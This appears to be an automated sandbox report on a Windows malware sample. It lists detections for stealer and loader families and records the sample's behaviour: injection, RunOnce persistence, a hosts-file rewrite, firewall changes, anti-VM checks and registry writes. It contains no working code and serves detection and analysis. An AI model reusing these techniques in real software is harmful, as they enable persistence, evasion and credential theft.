Analysis Overview
SHA256
35ab06be2e6fc0fc00327764f68a4f3fc27c1f1f0ad39f42615c82f0a9ce5312
Threat Level: Known bad
The file b98529ce274669010251a0048ff10fb9.exe was found to be: Known bad.
Malicious Activity Summary
Detect Mystic stealer payload
SmokeLoader
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Mystic
Detect ZGRat V1
Glupteba payload
Stealc
ZGRat
RedLine
Downloads MZ/PE file
Stops running service(s)
Modifies Windows Firewall
Drops file in Drivers directory
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Detected potential entity reuse from brand paypal.
Drops file in System32 directory
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Drops file in Program Files directory
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Enumerates system info in registry
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 21:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 21:56
Reported
2023-11-11 21:58
Platform
win10v2004-20231023-en
Max time kernel
151s
Max time network
156s
Signatures
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 3860 created 3380 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2A67.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\143.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected potential entity reuse from brand paypal.
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 7088 set thread context of 6328 | N/A | C:\Windows\System32\WaaSMedicAgent.exe | C:\Windows\system32\svchost.exe |
| PID 6488 set thread context of 5952 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8yo518RN.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 6472 set thread context of 4848 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9mE4sQ5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 6320 set thread context of 7868 | N/A | C:\Users\Admin\AppData\Local\Temp\2F0C.exe | C:\Users\Admin\AppData\Local\Temp\2F0C.exe |
| PID 4020 set thread context of 4644 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 5296 set thread context of 6500 | N/A | C:\Windows\System32\Conhost.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\Conhost.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
